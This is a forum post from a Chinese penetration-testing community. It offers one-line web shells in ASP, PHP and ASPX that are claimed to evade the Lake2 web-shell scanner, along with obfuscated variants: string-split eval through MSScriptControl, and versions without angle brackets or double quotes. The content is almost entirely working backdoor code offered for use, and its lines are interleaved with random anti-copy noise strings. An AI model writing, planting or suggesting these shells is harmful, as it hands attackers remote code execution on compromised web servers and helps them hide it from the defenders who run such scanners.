中国网络渗透测试联盟

标题: 过雷克图一句话木马 [打印本页]
作者: admin    时间: 2012-9-23 14:36
标题: 过雷克图一句话木马
asp一句话  <%execute(request("1"))%>  
2 A( Q& k. h. X5 r8 O6 q3 U- t1 p9 b* ~: }/ N, w
php一句话  <?php eval($_POST[1]);?>  / T. k& j% O8 q. B$ y
( z6 L# j! X) E8 b1 G) |( O
aspx一句话/ M; h! j2 u6 m/ i; ~$ N0 x
% M, U) w: x* T
<script language="C#" runat="server">
6 |' U9 S* y# S7 a' C2 i
3 Q4 o" ]7 L' g' tWebAdmin2Y.x.y aaaaa = new  WebAdmin2Y.x.y   ("add6bb58e139be10");7 {+ X( L( m5 b" ^
. D4 M, A3 d( D% @  M' a* O
</script>
8 z/ h. C9 _  L) J/ e0 e* r. R+ r8 ?' d; \' v. `/ C6 {
可以躲过雷客图的一句话。/ q. C; M# N& c* N0 k: L: v

5 T+ @  I( A3 F, R  <%& @4 X6 `( M# O) }% e. [

% y5 `! d( s, t. v  set ms = server.CreateObject("MSScriptControl.ScriptControl.1")" I, }7 s+ W) l7 r3 H

0 b8 b+ b6 {# F5 k, {8 o  ms.Language="VBScript"
# ~5 f' u5 v) A+ w! T0 N: ]% b2 d! _, q  p$ V8 |& p) a; k( v
  ms.AddObject "Response", Response
7 X# K( G5 v" s# O4 |: Z  o& W" i4 l9 {) h! @
  ms.AddObject "request", request
# J3 X# x2 W0 c0 I) n' P' u
( o# P6 U# N5 @% Z  ms.ExecuteStatement("ev"&"al(request(""1""))")0 {/ F2 {3 f* B+ F
" y0 E7 q; Q. Y9 U1 D5 h6 N
  %>7 F( Z0 d4 [4 g. l! T. _

( z5 Q- ~. T. A( e: l" @! I& j) |  不用'<,>'的asp一句话
1 v% t1 a* a( ^9 ^; F/ ?# J; G1 p* j0 |6 ?
  <script language=VBScript runat=server>execute request("1")</script>
; ^& E& r* P; _1 y- ^  I  B) Z! Z0 D
0 K4 J. X2 g8 P1 y1 E1 r  不用双引号的一句话。
8 Y1 S* b8 j% P0 ~/ O
2 E' w" ]- Y8 V' E( w6 |: p  <%eval request(chr(35))%>
' i, E! s+ X( J! A3 q# g+ P* s



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2